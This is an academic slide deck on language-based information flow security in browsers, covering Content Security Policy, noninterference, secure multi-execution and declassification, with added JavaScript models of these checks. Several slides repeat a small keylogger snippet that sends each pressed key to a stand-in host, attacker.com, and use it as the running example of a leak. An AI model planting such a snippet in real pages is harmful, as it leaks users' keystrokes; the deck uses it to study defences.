Language-based Information Flow Security Enforcements
Tamara Rezk, INRIA
Joint work with Nataliia Bielova, Raimil Cruz, Willem De Groef, Dominique Devriese, José Fragoso-Santos, Deepak Garg, Thomas Jensen, Frank Piessens, Alan Schmitt, Bernard Serpette, Francis Somé, Vineet Rajani, Éric Tanter
GT Verif, 30/05/17
Information Flow Problem

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }

secret input: e.charCode (the key the user pressed)
public output: new Image().src = url + leak (the request sent to attacker.com)

How can attacker code execute in my browser?
• If user goes to attacker's server
• Phishing
• XSS
• If user goes anywhere with third-party code

How can we protect from this kind of leak?
• Content Security Policy
• Same Origin Policy
• Capability systems
• Information Flow Enforcement
[CSF'16: On access control, capabilities, their equivalence, and confused deputy attacks]
Content Security Policy (CSP)

• Declare trusted contents to the browser
• Browser blocks unknown contents
Guarantee: unknown code will not steal user data

http://trusted.com
CSP policy: script-src 'self' third.com

<script> var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } </script>
Content Security Policy (CSP)

• Declare trusted contents to the browser
• Browser blocks unknown contents
Guarantee: unknown code will not steal user data

http://trusted.com
CSP policy: script-src 'self' third.com

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }

<iframe src="othertrustedpage.html"></iframe>
?
Content Security Policy (CSP)

http://trusted.com
CSP policy: script-src 'self' third.com
<iframe src="othertrustedpage.html"></iframe>

Inconsistencies with the Same Origin Policy [WWW'17 On the Content Security Policy Violations due to the Same-Origin Policy]
Analyzed 10K sites: 94% with CSP vulnerable, including sites such as amazon, imdb, twitter, etc.

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
Same Origin Policy

http://trusted.com
<iframe src="http://attacker.com"></iframe>

- It allows the programmer to isolate content inside a frame
- For the example below: leaks will still flow to the attacker server, but only for keys pressed inside the frame

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
More fine-grained enforcement: Information Flow Security

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
secret input: e.charCode
public output: new Image().src = url + leak
Information Flow Security

Security Property: Noninterference

Two runs of the same program, with equal public inputs and different secret inputs:
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
User presses key 100  →  http://attacker.com/?=100
User presses key 101  →  http://attacker.com/?=101

The public outputs differ: this program does not comply with Noninterference.
Information Flow Security

Security Property: Noninterference
Not a trace property; also in a computational flavor [POPL'08 Cryptographically Sound Implementations for Typed Information-Flow Security]

How to enforce it?
- Static Analysis [JCS'96 Volpano & Smith] [CSFW'04 Secure Information Flow by Self Composition]: not appropriate for the web context
- Dynamic or Hybrid Enforcements [SEC'14 An inlined monitor for JavaScript] [TGC'14 Modular Extensions of Web Monitors] [TGC'15 Hybrid Typing for JavaScript]

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
A taxonomy of information flow monitors [POST'16]

Figure: monitors classified along two axes, Soundness (TSNI, TANI, TINI) and Transparency (True, False).
We study 5 classes of monitors:
• NSU (no sensitive upgrade) [Zdancewic '02]
• PU (permissive upgrade) [Austin and Flanagan '10]
• HM (hybrid monitor) [Le Guernic et al. '06]
• MF (multiple facets) [Austin and Flanagan '12]
• SME (secure multi execution) [Devriese and Piessens '10]
Taxonomy: Transparency

Figure: the five monitors (NSU, PU, HM, MF, SME) compared pairwise, once for True Transparency and once for False Transparency.
Previous to [POST'16] work: HM and NSU/PU incomparable [Hedin, Bello, Sabelfeld et al. '15]
Spot the difference: MF and SME [ESORICS'16]

• MF (multiple facets) [Austin and Flanagan '12]
• SME (secure multi execution) [Devriese and Piessens '10]

Quotes from [POST'16] and [CSF'15]:
“Faceted evaluation is a technique for simulating secure multi-execution with a single process”
“Austin and Flanagan [6] show how secure multi-execution can be optimized by executing a single program on faceted values”
Secure Multi Execution (SME) [Devriese and Piessens Oakland'10]
(Based on presentation of T. Austin @ POPL'12)

Figure: two copies of the program run side by side. The HIGH PROCESS receives the secret input and the public inputs and produces the secret outputs; the LOW PROCESS receives a default input in place of the secret input, plus the public inputs, and produces the public outputs.

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
secret input: e.charCode
public output: new Image().src = url + leak

Execution of the Low Process with default input: example key 100
Secure Multi Execution

Recall: without SME, the program does not comply with Noninterference (two runs with different keys pressed, 102 and 101, produce different requests).

Under SME, the public output comes from the Low Process, which always runs on the default input (key 100):
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
User presses key 102, default input: key 100  →  http://attacker.com/?=100
User presses key 101, default input: key 100  →  http://attacker.com/?=100

The program executed under SME does comply with Noninterference.
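The two checks above (comparing the public outputs of two runs, and running a Low Process on the default input) are easy to make concrete. The following is an added example, not code from the slides or from the authors' tools: it models the keypress handler as a function from an input event to the requests it causes (by replacing `Image` with a recording stub), tests noninterference on a pair of runs, and then executes the same program under a minimal SME scheduler. The names `runProgram`, `isNoninterferent`, `smeRun`, `smeIsNoninterferent` and `DEFAULT_KEY` are this example's own.

```javascript
// Added example: noninterference test and SME execution of the keypress
// handler from the slides. Not from the slides or from any SME implementation.

const ATTACKER_URL = 'http://attacker.com/?=';
const DEFAULT_KEY = 100; // default input handed to the Low Process (as on the slides)

// The program from the slides, run on one keypress event. `Image` is replaced by
// a stub whose `src` setter records the URL instead of issuing a network request,
// so the returned array is exactly the program's public output.
function runProgram(keyEvent) {
  const requests = [];
  const Image = function () {
    const img = {};
    Object.defineProperty(img, 'src', { set(v) { requests.push(v); } });
    return img;
  };
  var url = ATTACKER_URL;
  const onkeypress = function (e) { var leak = e.charCode; new Image().src = url + leak; };
  onkeypress(keyEvent);
  return requests;
}

// Noninterference on one pair of runs: same public inputs (there are none here),
// different secret inputs (the key pressed), public outputs must be equal.
function isNoninterferent(run, secret1, secret2) {
  const out1 = JSON.stringify(run({ charCode: secret1 }));
  const out2 = JSON.stringify(run({ charCode: secret2 }));
  return out1 === out2;
}

// SME: the High Process sees the real secret input and its outputs stay secret
// (here: they are returned but never released); the Low Process sees only the
// default input and is the only one whose outputs become public.
function smeRun(run, realKey) {
  const secretOutputs = run({ charCode: realKey });
  const publicOutputs = run({ charCode: DEFAULT_KEY });
  return { secretOutputs, publicOutputs };
}

// The same pairwise test, applied to the SME-executed program.
function smeIsNoninterferent(run, secret1, secret2) {
  return JSON.stringify(smeRun(run, secret1).publicOutputs) ===
         JSON.stringify(smeRun(run, secret2).publicOutputs);
}
```

`isNoninterferent(runProgram, 100, 101)` is false, reproducing the slide's two runs, while `smeIsNoninterferent(runProgram, 102, 101)` is true because both Low Process runs request `http://attacker.com/?=100`. Testing one pair of runs can only refute noninterference; it does not prove it, which is why the slides turn to enforcement mechanisms rather than testing.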
Secure Multi Execution (SME)

var d=0, url = 'http://analytics.com/?='; onkeypress = function(e) { if (e.charCode == 101) d=1; } onunload = function() { $.ajax(url+d); }

Is Noninterference or SME enough in practice?
Google analytics library used in 86% of top 10K sites (https://webstats.inria.fr/)
Declassification [Li & Zdancewic POPL'05 - Relaxed Noninterference]

Lattice of downgrading policies, from top secret down to public:
  top secret:  λx:String. c                      (c is a constant string; the literal is illegible in the extracted slide)
  medium:      λx:String. λy:String. x == y
  public:      λx:String. x
Each point in the lattice is a downgrading policy
Information Flow Security

Security Property: Declassification
The secret is given a policy: a function f.
v1 =_f v2 iff f(v1) = f(v2)
Figure: two runs of program P on secret inputs related by =_f (and equal public inputs) must produce equal public outputs.
Secure Multi Execution with Declassification [CSF'14 Stateful Declassification Policies for Event-Driven Programs]

Figure: inputs go to the High Process, which produces the secret outputs, and through the declassifier D to the Low Process, which produces the public outputs; D also feeds the Low Process through a release channel.
Declassifier D generalizes information flow labels as in [Li & Zdancewic POPL'05]
Secure Multi Execution (SME) with Declassification

Without declassification:
var d=0, url = 'http://analytics.com/?='; onkeypress = function(e) { if (e.charCode == 101) d=1; } onunload = function() { $.ajax(url+d); }

With declassification:
var d=0, url = 'http://analytics.com/?='; onkeypress = function(e) { if (e.charCode == 101) d=1; } onunload = function() { r = declassify(d); $.ajax(url+r); }

D(s, i) = if i = KeyPress 101 and not s
          then (True, Release 1, KeyPress 100)
          else (s, Unchanged, KeyPress 100)
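To see the stateful declassifier at work, here is an added example that is not code from the slides or from the CSF'14 implementation. It transcribes D from the slide into JavaScript and wires it into a small SME scheduler for the analytics program: the High Process receives the real events, the Low Process receives whatever D hands it, and `declassify()` in the Low Process reads the release channel. The event encoding (`{type:'KeyPress', code}` and `{type:'Unload'}`), the treatment of `Unload` as a public event delivered to both processes, and the rule that `declassify(d)` returns the Low Process's own `d` when nothing has been released yet are this example's own assumptions.

```javascript
// Added example: SME with the stateful declassifier D from the slide, applied
// to the analytics program. Not from the slides or the CSF'14 implementation.

const ANALYTICS_URL = 'http://analytics.com/?=';

// D(s, i) as on the slide. State s records whether the value was already
// released. On the first KeyPress 101, release the value 1; in every case the
// Low Process only ever sees KeyPress 100 as its (default) secret input.
function D(s, i) {
  if (i.type === 'KeyPress' && i.code === 101 && !s) {
    return { state: true, release: 1, lowInput: { type: 'KeyPress', code: 100 } };
  }
  return { state: s, release: null, lowInput: { type: 'KeyPress', code: 100 } };
}

// The analytics program with declassification, parameterised by the
// declassify() primitive and by the network call (recorded, not sent).
function makeProgram(declassify, ajax) {
  var d = 0, url = ANALYTICS_URL;
  const onkeypress = function (e) { if (e.charCode === 101) d = 1; };
  const onunload = function () { var r = declassify(d); ajax(url + r); };
  return { onkeypress, onunload };
}

// Run one event sequence under SME + D. Returns the requests of each process;
// only publicRequests would leave the browser.
function smeWithDeclassification(events) {
  const secretRequests = [], publicRequests = [];
  let released = null;  // release channel: last value released by D (assumption)
  let s = false;        // declassifier state
  const high = makeProgram(v => v, u => secretRequests.push(u));
  const low = makeProgram(v => (released === null ? v : released),
                          u => publicRequests.push(u));
  for (const ev of events) {
    if (ev.type === 'KeyPress') {
      high.onkeypress({ charCode: ev.code });          // real input
      const step = D(s, ev);                            // policy decides
      s = step.state;
      if (step.release !== null) released = step.release;
      low.onkeypress({ charCode: step.lowInput.code }); // default input
    } else if (ev.type === 'Unload') {                  // public event: both see it
      high.onunload();
      low.onunload();
    }
  }
  return { secretRequests, publicRequests };
}
```

With the sequence KeyPress 100, KeyPress 101, Unload the Low Process's own `d` stays 0, but `declassify(0)` returns the released value 1, so the public request is `http://analytics.com/?=1`; with KeyPress 103, Unload nothing is released and the public request is `http://analytics.com/?=0`. Any two sequences that agree on whether key 101 was pressed produce the same public output, which is exactly the one bit D allows to be learnt.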
Password Checker does not comply with Noninterference

var password; var input; var output; output = (password == input)
password: secret, input: public

The output depends on the secret password, so Noninterference forbids making it public; releasing it requires declassification.
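The "secret = function f" view from the Declassification slide and the password checker above fit together in a few lines. The following is an added example, not code from the slides or from Li & Zdancewic: policies are JavaScript functions on strings, two secrets are f-equivalent when f(v1) and f(v2) agree (functions are compared extensionally over a small constructed domain), and a program satisfies relaxed noninterference for f when f-equivalent secrets give equal public outputs for every public input. The constant `'nothing'` stands in for the illegible constant of the top-secret policy, and `DOMAIN`, `observation`, `fEquivalent`, `satisfiesRelaxedNI` and `policiesSatisfied` are this example's own names.

```javascript
// Added example: relaxed noninterference with policy functions, checked on the
// password checker from the slide. Not from the slides or from Li & Zdancewic.

// Constructed finite sample of String, used to compare policies extensionally.
const DOMAIN = ['hunter2', 'letmein', 'pass'];

// Three points of the lattice from the slides, as functions on strings.
const policies = {
  topSecret: (x) => 'nothing',          // λx. constant ('nothing' is this example's stand-in)
  medium:    (x) => (y) => x === y,     // λx. λy. x == y: only equality tests may be learnt
  public:    (x) => x,                  // λx. x: the whole secret may be learnt
};

// What an observer may learn about secret v under policy f. If f(v) is itself a
// function (the medium policy), tabulate it over DOMAIN so it can be compared.
function observation(f, v) {
  const r = f(v);
  return JSON.stringify(typeof r === 'function' ? DOMAIN.map(r) : r);
}

// v1 =_f v2 iff f(v1) = f(v2)
function fEquivalent(f, v1, v2) {
  return observation(f, v1) === observation(f, v2);
}

// The password checker from the slide: secret password, public input, public output.
function passwordChecker(password, input) {
  return password === input;
}

// Relaxed noninterference for f: for all f-equivalent secrets and all public
// inputs, the public output must be equal.
function satisfiesRelaxedNI(program, f) {
  for (const v1 of DOMAIN) {
    for (const v2 of DOMAIN) {
      if (!fEquivalent(f, v1, v2)) continue;
      for (const input of DOMAIN) {
        if (program(v1, input) !== program(v2, input)) return false;
      }
    }
  }
  return true;
}

// Names of the lattice points (in the order above) for which program is secure.
function policiesSatisfied(program) {
  return Object.keys(policies).filter((name) => satisfiesRelaxedNI(program, policies[name]));
}
```

Under the top-secret policy every pair of passwords is equivalent, so `'hunter2'` and `'letmein'` must give the same output on input `'hunter2'`; they do not, which is the slide's statement that the checker violates noninterference. Under the medium policy only equal passwords are equivalent, so the checker is accepted: the only thing it reveals is an equality test, which is what the policy permits.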
Declassification [Li & Zdancewic POPL'05]

  secret:  λx:String. c                      (c is a constant string; the literal is illegible in the extracted slide)
  medium:  λx:String. λy:String. x == y
  public:  λx:String. x

Figure: the lattice with H at the top, L at the bottom and the policies P in between.

Declassification: An Object Oriented perspective [ECOOP'17, Type Abstraction for Noninterference]
We use object interfaces as security levels:
  λx:String. c                       ↔  {}
  λx:String. λy:String. x == y       ↔  {==(y:String):String}
  λx:String. x                       ↔  {…full String interface…}
  (the slide also shows λx:String. x.… applying one method of x; the method name is illegible in the extracted slide)
String ≡ String↑String
We lost the computation specification. We just talk about the interface. Problems?
Summary

Language-based Information Flow Security
- provides a fine-grained mechanism to specify and enforce propagation of information
- strict property: noninterference (TINI, TSNI, computational, …)
- relaxed properties: declassification (another zoo, RNI)

Enforcements:
- Dynamic Mechanisms: state of the art is Secure Multi Execution and Multiple Facets
- Purely Static: not convenient for web applications; promising direction in using parametricity properties for soundly typing declassification policies